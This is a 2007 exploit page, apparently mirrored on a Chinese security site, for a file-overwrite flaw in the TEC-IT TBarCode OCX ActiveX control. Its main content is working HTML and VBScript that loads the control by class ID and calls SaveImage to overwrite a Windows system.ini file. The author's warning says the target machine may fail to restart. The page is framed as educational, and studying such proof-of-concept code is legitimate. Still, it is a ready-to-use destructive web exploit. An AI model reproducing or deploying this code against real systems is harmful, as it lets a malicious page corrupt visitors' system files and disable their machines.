首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TEC-IT TBarCode OCX ActiveX Remote Arbitrary File Overwrite Exploit
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2007-06-13  
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------------------
<b>TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite</b>
url: http://www.tec-it.com/asp/main/startfr.asp?LN=1

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.

<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
-----------------------------------------------------------------------------------------------------------------

<object classid='clsid:D8541765-F6D2-4EE1-AEAA-4016BE1D9859' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
  On Error Resume Next
   Dim MyMsg
   If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
             "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
             "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
             " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
             " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
    test.SaveImage "c:\windows\system_.ini", 1, 1, 1, 1, 1
    MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/21 - TEC-IT TBarCode")
   Else
    MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/21 - TEC-IT TBarCode")
   End If
End Sub
</script>

</span></span>
</code></pre>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ace-FTP Client 1.24a Remote Bu
·Safari 3 for Windows Beta Remo
·Internet Download Accelerator
·Fuzzylime Forum 1.0 (low.php t
·PHP Real Estate Classifieds Re
·Microsoft Speech API ActiveX c
·e-Vision CMS <= 2.02 SQL Injec
·Microsoft Speech API ActiveX c
·Yahoo! Messenger Webcam 8.1 (Y
·Microsoft Office MSODataSource
·Yahoo! Messenger Webcam 8.1 (Y
·Sitellite CMS <= 4.2.12 (55966
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved